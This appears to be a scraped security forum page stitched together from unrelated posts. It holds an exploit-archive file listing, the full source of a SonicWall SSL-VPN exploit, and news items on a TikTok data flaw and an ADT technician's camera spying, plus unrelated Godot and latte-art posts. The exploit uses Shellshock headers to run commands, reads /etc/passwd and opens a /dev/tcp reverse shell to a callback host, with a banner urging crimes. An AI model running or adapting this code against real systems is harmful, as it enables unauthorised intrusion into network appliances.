434 obiee11117140715-xss.txt 01/14/2021 05:10 PM 505 ocs10-sql.txt 01/08/2021 05:22 PM 817 odas10-xss.txt 01/29/2021 02:59 PM 1,395 ogs10-sql.txt 01/15/2021 05:04 PM 2,486 ohrs10-sql.txt 01/15/2021 05:05 PM 1,561 ohrs10-xsrf.txt 01/15/2021 05:01 PM 961 ohrs10-xss.txt 01/05/2021 06:29 PM 582 oms10-sql.txt 01/21/2021 05:03 PM 1,841 onlinedsp10-sql.txt 01/14/2021 01:14 AM 782 onlinehotelreservation10-sql.txt 01/05/2021 06:24 PM 2,568 onlinelms10-exec.txt 01/14/2021 01:17 AM 784 onlinemoviestreaming10-sql.txt 01/11/2021 06:16 PM 1,137 opencart3036ato-xsrf.txt 01/27/2021 04:04 PM 1,936 openlitespeedws178-exec.txt 01/29/2021 03:03 PM 4,030 oraclews12210-exec.txt 01/22/2021 05:17 PM 9,166 oraclews14110-exec.txt 01/19/2021 04:28 PM 960 osticket1142-ssrf.txt 01/29/2021 03:07 PM 1,075 ovs10-bypass.txt 01/08/2021 04:57 PM 16,432 oxappsuite7104-ssrfxss.txt 01/07/2021 06:33 PM 2,379 paperstreamip14205685-escalate.txt 01/15/2021 04:59 PM 1,230 phpfusion90390-xsrf.txt 01/11/2021 06:05 PM 1,656 pk43657838136-disclose.txt 01/11/2021 06:22 PM 551 prestashop1770-sql.txt 01/28/2021 04:19 PM 10,370 prtg_authenticated_rce.rb.txt 01/27/2021 04:26 PM 25,918 QSA-CVE-2021-3156.txt 01/29/2021 02:57 PM 2,222 quickcms67-exec.txt 01/06/2021 05:47 PM 783 responsiveelearningsystem10-shell.txt 01/06/2021 05:48 PM 780 responsiveelearningsystem10-xss.txt 01/05/2021 06:09 PM 2,064 responsivees10-sql.txt 01/05/2021 06:04 PM 2,068 responsivefm9134-traversal.txt 01/24/2021 12:32 PM 6,430 REVIVE-SA-2021-001.txt 01/27/2021 04:17 PM 4,492 REVIVE-SA-2021-002.txt 01/04/2021 06:16 PM 575 rmjaw10-shell.txt 01/05/2021 06:10 PM 498 rmjaw10-sql.txt 01/04/2021 06:34 PM 586 rmjaw10-xss.txt 01/04/2021 06:42 PM 5,618 rockrms-uploadtakeover.txt 01/13/2021 05:15 PM 20,386 SA-20210113-0.txt 01/13/2021 05:19 PM 7,160 SA-20210113-1.txt 01/05/2021 05:34 PM 1,007 sar2html321plot-exec.txt 01/26/2021 04:04 PM 1,702 scws10-sql.txt 01/26/2021 04:07 PM 2,179 scws10full-xss.txt 01/21/2021 05:18 PM 3,728 simplejobboard-fileread.rb.txt 01/12/2021 06:16 PM 1,595 smartagent310-escalate.txt 01/07/2021 06:39 PM 1,735 sonatypenexus3211-exec.txt 01/05/2021 06:41 PM 11,268 spamtitan_unauth_rce.rb.txt 01/26/2021 04:15 PM 912 spcr10-sql.txt 01/26/2021 04:21 PM 922 spcr10-xss.txt 01/05/2021 05:39 PM 491 subrioncms421avatar-xss.txt 01/26/2021 04:14 PM 841 tendaac5ac1200-xss.txt 01/08/2021 04:42 PM 3,690 TRSA-2010-01.txt 01/13/2021 05:03 PM 5,895 TSI-ADV122020.txt 01/26/2021 03:40 PM 3,130 VisualDoor-main.zip 01/20/2021 04:15 PM 8,710 voterexploit.py.txt 01/06/2021 06:02 PM 11,811 winavr20100110-insecurepermissions.txt 01/06/2021 05:44 PM 3,264 wp24domaincheck162-xss.txt 01/08/2021 04:49 PM 3,826 wpautoptimize276-shell.rb.txt 01/11/2021 06:39 PM 879 wpcgv105-xss.txt 01/02/2021 12:21 PM 3,627 wpcore522-xss.txt 01/08/2021 05:28 PM 4,158 wpdiscuz704-shell.rb.txt 01/15/2021 05:02 PM 913 wpecf117-xss.txt 01/06/2021 05:57 PM 1,957 wplitespeedcache36-xss.txt 01/05/2021 06:15 PM 2,149 wppaginate213-xss.txt 01/05/2021 06:14 PM 7,768 wpstripepayments2039-xss.txt 01/28/2021 04:06 PM 1,719 wpsuperforms49-shell.txt 01/12/2021 06:32 PM 3,241 wp_ait_csv_rce.rb.txt 01/17/2021 10:11 PM 1,669 xwikicms12102-xss.txt 01/22/2021 05:18 PM 2,647 ZSL-2021-5614.txt 01/22/2021 05:20 PM 4,138 ZSL-2021-5615.txt 01/22/2021 05:22 PM 3,983 ZSL-2021-5616.txt 01/22/2021 05:26 PM 3,716 ZSL-2021-5617.txt 01/22/2021 05:27 PM 4,376 ZSL-2021-5618.txt 01/22/2021 05:28 PM 2,299 ZSL-2021-5619.txt 01/22/2021 05:32 PM 3,916 ZSL-2021-5620.txt 01/22/2021 05:36 PM 2,671 ZSL-2021-5621.txt 01/22/2021 05:38 PM 8,353 ZSL-2021-5622.txt 01/27/2021 04:20 PM 6,897 ZSL-2021-5623.txt 01/27/2021 04:22 PM 1,399 ZSL-2021-5624.txt 01/27/2021 04:23 PM 1,978 ZSL-2021-5625.txt 01/16/2021 09:32 PM 7,543 zynos_scanner.pl.txt 232 File(s) 3,368,705 bytes 2 Dir(s) 14,911,889,408 bytes free Download 202101-exploits.tgz (2.6 MB) Source
-
SonicWall SSL-VPN Exploit, as used by Phineas Fisher to hack Cayman Trust Bank and Hacking Team. Unauthenticated, gives you a "nobody" shell. Getting root is an exercise for the user. For details see: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ #!/usr/bin/python # coding: utf-8 # Author: Darren Martyn # Credit: Phineas Fisher # Notes: # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns # a trivial reverse shell using /dev/tcp. # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but # implementing that is left as an exercise for the reader. I've seen a few approaches, and # would be interested in seeing yours. # There is another LPE that works only on some models which I also have removed from this. # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ import requests import sys import telnetlib import socket from threading import Thread from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import time def banner(): print """ 88 88 "" 88 88 8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 `8b d8' 88 I8[ "" 88 88 "" `Y8 88 `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 88 88 88 ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, a8" `Y88 a8" "8a a8" "8a 88P' "Y8 8b 88 8b d8 8b d8 88 "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 SonicWall SSL-VPN Appliance Remote Exploit Public Release (Jan 2021). Author: Darren Martyn. Credit goes to Phineas Fisher for this. Stay inside, do crimes. """ def handler(lp): # handler borrowed from Stephen Seeley. print "(+) starting handler on port %d" %(lp) t = telnetlib.Telnet() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", lp)) s.listen(1) conn, addr = s.accept() print "(+) connection from %s" %(addr[0]) t.sock = conn print "(+) pop thy shell!" t.interact() def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} r = requests.get(url=url, headers=headers, verify=False) return r.text def check_exploitable(target): print "(+) Testing %s for pwnability..." %(target) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print "(*) We can continue, time to wreck this shit." return True else: return False def pop_reverse_shell(target, cb_host, cb_port): print "(+) Sending callback to %s:%s" %(cb_host, cb_port) backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) execute_command(target=target, command=backconnect) def hack_the_planet(target, cb_host, cb_port): if check_exploitable(target) == True: pass else: sys.exit("(-) Target not exploitable...") handlerthr = Thread(target=handler, args=(int(cb_port),)) handlerthr.start() pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) def main(args): banner() if len(args) != 4: sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) if __name__ == "__main__": main(args=sys.argv) Download VisualDoor-main.zip or git clone https://github.com/darrenmartyn/VisualDoor.git Source
- 1 reply
-
- 1
-
Nu poti ajunge din Africa <--> Romania in 2h
-
Flaw in popular video-sharing app left phone numbers and profile settings open to malicious activity. TikTok has patched a vulnerability that left users open to having personal information scraped. Angela Lang/CNET A vulnerability identified in the popular video-sharing app TikTok exposed users to having personal information scraped from their profile, including their phone number and profile settings, security researchers at cybersecurity firm Check Point said Tuesday. That information could have been used to manipulate users' account details and build a database of TikTok users for malicious activity, researchers said. The flaw in the app's Find Friends feature also exposed users' nicknames, profile and avatar pictures, and unique user IDs, Check Point said. There's no evidence that the vulnerability was ever exploited, and the flaw has reportedly been patched. TikTok called security and privacy in its community its highest priority and thanked Check Point for bringing the vulnerability to its attention. TikTok, which operates outside China but is owned by Chinese tech company ByteDance, has run into its share of controversy when it comes to the security of user data. A California user sued the company in 2019, alleging TikTok shares user data with the Chinese government. The US Army banned service members from using the app on government phones, after initially using the service for recruitment. It's also not the first TikTok vulnerability discovered by TikTok. Earlier this month, researchers at the firm identified a series of software flaws in the app that opened the door to a range of attacks on users, including the sending of legitimate-looking text messages with links to malicious software and manipulating videos stored on the service. Via cnet.com
-
Latte Art Simulator https://barist.art Author: Sunny Balasubramanian
-
Please use this platform to interact with speakers and other GodotCon attendees. Big thank you to Prehensile Tales (https://prehensile-tales.com/) for setting up and hosting this chat on behalf of the Godot project. Content: 0:00:00 - Welcome talk - Rémi Verschelde 0:15:00 - WebXR in Godot - David Snopek 0:45:00 - (Almost) A Year of Fam Jams - Paul Gestwicki 1:15:00 - Visualizing Austria in Godot - Karl Bittner & Mathias Baumgartinger 1:45:00 - Authoritative Multiplayer with Godot - Stefan_Gamedev 2:15:00 - Teaching Godot Engine: Learning Experience Design - Gastón Caminiti 2:45:00 - Wwise Godot Integration: integrating audio middleware into Godot - Alessandro Famà & Jorge Garcia 3:15:00 - The Garden Path - Louis Durrant 3:26:10 - Godex: An ECS for Godot - Andrea Catania 3:38:00 - Dialog and system in visual novel Hauma - Senad Hrnjadovic 3:58:00 - The new rendering of Godot 4.0 - Juan Linietsky 4:15:00 - Godot apps on the Web: What's new, tricks, need to know - Fabio Alessandrelli 4:45:00 - Interacting with the Internet of Things for pleasure and profit - Julian Todd 5:15:00 - Godot for the Enterprise - Luke Dary 5:45:00 - Shader shenanigans - Paweł Fertyk 6:15:00 - Godot Wild Jam's story - Kati Baker 6:45:00 - Extending the 2D Renderer: Adding 3D-Like Shadowing - Pedro J. Estébanez 7:16:15 - Outro (2020 retrospective video, 2020 showcase video) Source
-
Prosecutors said the technician accessed more than 200 customer CCTV systems on more than 9,600 occasions to spy on them getting naked and engaging in sexual activity. Image: Cyrus Crossan A Texas-based CCTV technician pleaded guilty this week to illegally accessing the security cameras of hundreds of families to watch people in their homes get naked and engage in sexual activities. According to a criminal complaint [PDF], Telesforo Aviles, a 35-year-old, committed his crimes between November 2015 and March 2020 while working as a support technician for ADT, a provider of home security services. Aviles's job involved installing home video surveillance cameras at customer premises and configuring the devices to work with the company's proprietary ADT Pulse app. But prosecutors said that Aviles strayed from company policy and started adding his personal email address to customers ADT Pulse app during the installation and testing process. Investigators said the technician usually targeted attractive women, and he used the backdoor account to access the camera's real-time video feed and spy on customers in intimate moments in their homes and with their partners. The technician's scheme was discovered in January and February 2020 when several customers discovered Aviles' email address in their app's configuration panel and reported the incidents to ADT, which later referred the case to authorities. Aviles was charged in April 2020 and pleaded guilty [PDF] this week, on Thursday. Prosecutors said Aviles accessed more than 200 customer CCTV systems on more than 9,600 occasions. The former ADT technician now faces a sentence of up to five years in prison and a fine of up to $250,000, according to court documents. He was conditionally released earlier this week [PDF]. ADT notified its customers of the incident in April 2020. The New York Post reported at the time that the company tried to convince customers to sign a confidentiality agreement in exchange for a monetary payment so Aviles' actions wouldn't leak online. Their efforts didn't work, and the company is currently facing three class-action lawsuits[1, 2, 3] as a result of its former employee's actions. Via zdnet.com